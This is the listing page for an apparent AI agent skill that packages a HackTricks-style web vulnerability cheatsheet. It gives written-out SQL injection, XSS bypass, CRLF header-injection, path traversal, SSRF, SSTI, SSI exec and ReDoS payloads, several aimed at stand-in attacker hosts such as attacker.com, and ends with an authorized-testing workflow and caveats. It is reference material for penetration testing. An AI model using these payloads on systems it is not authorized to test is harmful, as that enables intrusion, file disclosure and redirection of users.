OpenSkillIndex← back to search

Hacktricks-skills web-vulns-cheatsheet

Web vulnerability payloads and testing techniques for security assessments. Use this skill whenever the user is doing penetration testing, bug bounty hunting, security research, or needs web vulnerability payloads (SQL injection, XSS, path traversal, SSRF, SSTI, etc.). Trigger on requests for exploit payloads, vulnerability testing, security audit help, or when analyzing web application security.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list/SKILL.MD
source content

Web Vulnerabilities Cheatsheet

A comprehensive reference for web vulnerability payloads and testing techniques. Use this during security assessments, penetration testing, or bug bounty hunting.

Quick Reference by Vulnerability Type

SQL Injection

Time-based blind SQLi payloads:

  • 1;sleep(9);#
    - MySQL
  • ';sleep(9);#
    - MySQL with quote
  • ";sleep(9);#
    - MySQL with double quote
  • /*$(sleep 5)
    - Unix command injection variant
  • /*
    sleep 5``*/` - Backtick variant

Polyglot payloads (work across multiple contexts):

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

Cross-Site Scripting (XSS)

Basic XSS payloads:

  • <script>alert(1)</script>
  • <img src=x onerror=alert(1)>
  • javascript:alert(1)
  • " onclick=alert(1)//

Advanced XSS bypasses:

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html " onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
"><marquee><img src=x onerror=confirm(1)></marquee>"
"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>

XSS with HTTP header injection:

%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

Path Traversal

Unix/Linux paths:

  • /etc/passwd
  • /etc/hostname
  • /../../../../../../etc/hosts

Windows paths:

  • C:/windows/system32/drivers/etc/hosts
  • ..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts

Mixed traversal patterns:

  • ..\\..\\..\\..\\..\\..\\etc/hosts
  • ..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts

Server-Side Request Forgery (SSRF)

External resource access:

  • http://asdasdasdasd.burpcollab.com/mal.php
  • \\asdasdasdasd.burpcollab.com/mal.php

Domain bypass techniques:

  • www.whitelisted.com.evil.com
    - Subdomain injection
  • //google.com
    - Protocol-relative bypass

Server-Side Template Injection (SSTI)

Template engine detection:

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%

Jinja2/Python SSTI:

  • {{7*7}}
    - Basic expression
  • ${{7*7}}
    - Nested syntax

ASP/Classic ASP:

  • <%= 7*7 %>

Ruby ERB:

  • <%[%'"}}%
    variants

XML External Entity (XXE)

XSLT-based XXE:

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Server-Side Include (SSI)

SSI injection:

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>

Regular Expression Denial of Service (ReDoS)

Vulnerable regex patterns:

  • (\w*)+$
    - Catastrophic backtracking
  • ([a-zA-Z]+)*$
    - Nested quantifiers
  • ((a+)+)+$
    - Multiple nested groups

Testing Workflow

1. Reconnaissance

  • Identify input vectors (URL parameters, POST data, headers, cookies)
  • Map application technology stack
  • Check for WAF/IPS presence

2. Payload Testing

  • Start with simple payloads to confirm vulnerability
  • Escalate to complex payloads for exploitation
  • Test polyglot payloads for context-independent injection

3. Verification

  • Use time-based delays for blind vulnerabilities
  • Check for out-of-band callbacks (burpcollab)
  • Verify file access for path traversal
  • Confirm code execution for SSTI/SSRF

4. Documentation

  • Record successful payloads
  • Note application behavior
  • Capture evidence (screenshots, logs)

Important Notes

Legal & Ethical:

  • Only test systems you have explicit authorization to assess
  • Document all findings for responsible disclosure
  • Follow bug bounty program rules and scope

Safety:

  • Test in isolated environments when possible
  • Avoid destructive payloads in production
  • Use time-based detection over data exfiltration during initial testing

Context Matters:

  • Payloads may need encoding based on context (URL, HTML, JavaScript)
  • WAFs may block common patterns - try variations
  • Application-specific filters may require custom payloads

When to Use This Skill

Use this skill when:

  • Conducting authorized penetration tests
  • Participating in bug bounty programs
  • Learning web security concepts
  • Needing quick reference for vulnerability payloads
  • Analyzing web application security issues
  • Preparing security assessments

Do NOT use this skill for:

  • Unauthorized access to systems
  • Malicious activities
  • Testing without proper authorization
  • Any illegal purposes